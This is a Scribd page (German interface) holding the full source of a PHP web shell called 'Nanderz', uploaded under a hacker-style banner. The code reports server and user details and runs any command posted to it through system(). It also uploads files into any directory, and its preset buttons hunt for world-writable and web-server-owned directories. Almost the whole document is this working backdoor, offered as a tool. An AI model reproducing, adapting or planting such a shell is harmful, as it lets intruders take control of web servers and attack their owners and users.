Scribd Logo
Hochladen

Willkommen bei Scribd!

  • Nanderz Meta

    Hochgeladen von

    fr4ngky
    35 Ansichten4 Seiten

    Originaltitel

    <HTML> <Head> <Body Text="#00ff00" Bgcolor="#000000"> <Title>Nanderz</Title> <Meta

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Verfügbare Formate

    TXT, PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    35 Ansichten4 Seiten

    Nanderz Meta

    Hochgeladen von

    fr4ngky

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 4

    <html>

    <head>
    <body text="#00ff00" bgcolor="#000000">
    <title>Nanderz</title>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <center><font face="trebuchet ms" size="4"><b>system http://d3informatika.weebly
    .com </b></p></center>
    <?php
    print "<style>body{text:#999999;bgcolor:#000000;font-family:tahoma ms;font-size:
    15px;}hr{width:100%;height:2px;}</style>";
    print "<center><h1>WELLCOME TO ZONA REKAYASA</h1></center>";
    print "<hr><hr>";
    closelog( );
    $user = get_current_user( );
    $login = posix_getuid( );
    $euid = posix_geteuid( );
    $ver = phpversion( );
    $gid = posix_getgid( );
    if ($chdir == "") $chdir = getcwd( );
    if(!$whoami)$whoami=exec("whoami");
    ?>
    <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
    <?php
    $uname = posix_uname( );
    while (list($info, $value) = each ($uname)) {
    ?>
    <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b><spa
    n style="font-size: 9pt"><?= $info ?>
    <span style="font-size: 9pt">:</b> <?= $value ?></span></DIV></TD>
    </TR>
    <?php
    }
    ?>
    <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">User Info:</b> uid=<?= $login ?>(<?= $whoami?>)
    euid=<?= $euid ?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></T
    D>
    </TR>
    <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Server Services:</b> <?= "$SERVER_SOFTWARE $SER
    VER_VERSION"; ?>
    </span></DIV></TD>
    </TR>
    <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Permision Directory:</b> <? if(@is_writable($ch
    dir)){ echo "Yes";
    }else{ echo "No"; } ?>
    </span></DIV></TD>
    </TR>
    <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Server Address:</b> <?= "$SERVER_ADDR $SERVER_N
    AME"; ?>
    </span></DIV></TD>
    </TR>
    <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">Current User:</b> <?= $user ?></span></DIV></TD
    >
    </TR>
    <TR>
    <TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
    <span style="font-size: 9pt">PHP Version:</b> <?= $ver ?></span></DIV></TD>
    </TR>
    </TABLE>
    </b>
    </div></font></div>
    <?php
    set_magic_quotes_runtime(0);
    $currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
    $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
    $UName = `uname -a`;
    $SCWD = `pwd`;
    $UserID = `id`;
    if( $currentWD == "" ) {
    $currentWD = $SCWD;
    }
    if( $_POST['_act'] == "List File" ) {
    $currentCMD = "ls -la";
    }
    if( $_POST['_act'] == "IP" ) {
    $currentCMD = "/sbin/ifconfig|grep inet";
    }
    if( $_POST['_act'] == "Proses" ) {
    $currentCMD = "ps -wx";
    }
    if( $_POST['_act'] == "Memory" ) {
    $currentCMD = "free";
    }
    if( $_POST['_act'] == "777" ) {
    $currentCMD = "find / -perm 777 -type d";
    }
    if( $_POST['_act'] == "nobody" ) {
    $currentCMD = "find / -user nobody -type d";
    }
    if( $_POST['_act'] == "apache" ) {
    $currentCMD = "find / -user apache -type d";
    }
    if( $_POST['_act'] == "httpd" ) {
    $currentCMD = "find / -user httpd -type d";
    }
    if( $_POST['_act'] == "www" ) {
    $currentCMD = "find / -user www -type d";
    }
    if( $_POST['_act'] == "www-data" ) {
    $currentCMD = "find / -user www-data -type d";
    }
    print "<form method=post enctype=\"multipart/form-data\"><hr><hr><table>";
    print "<tr><td><b>Command:</b></td><td><input size=100 name=\"_cmd\"
    value=\"".$currentCMD."\"></td>";
    print "<td><input type=submit name=_act value=\"Run\"></td></tr>";
    print "<tr><td><b>Directory:</b></td><td><input size=100 name=\"_cwd\"
    value=\"".$currentWD."\"></td>";
    print "<td><input type=submit name=_act value=\"List File\"></td></tr>";
    print "<tr><td><b>Upload file:</b></td><td><input size=88 type=file name=_upl></
    td>";
    print "<td><input type=submit name=_act value=\"Upload\"></td></tr>";
    print "<tr><td><b>Find:</b></td>";
    print "<td><input type=submit name=_act value=\"IP\"><b> <b><input type=submit n
    ame=_act
    value=\"Proses\"><b> <b><input type=submit name=_act value=\"777\"><b> <b><input
    type=submit
    name=_act value=\"nobody\"><b> <b><input type=submit name=_act value=\"apache\">
    <b> <b><input
    type=submit name=_act value=\"httpd\"><b> <b><input type=submit name=_act value=
    \"www\"><b>
    <b><input type=submit name=_act value=\"www-data\"></td></tr>";
    print "</table></form><hr><hr>";
    $currentCMD = str_replace("\\\"","\"",$currentCMD);
    $currentCMD = str_replace("\\\'","\'",$currentCMD);
    if( $_POST['_act'] == "Upload" ) {
    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
    print "<center><b>gagal euy tapu wale!!!</b></center>";
    } else {
    print "<center><pre>";
    system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_up
    l']['name']." 2>&1");
    print "</pre><b>MANTAP SEKAAAAAAAAAAA!!!</b></center>";
    }
    } else {
    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
    system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
    /tmp/cmdtemp");
    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Na
    nderz</b></center>";
    }
    exit;
    ?>

    Das könnte Ihnen auch gefallen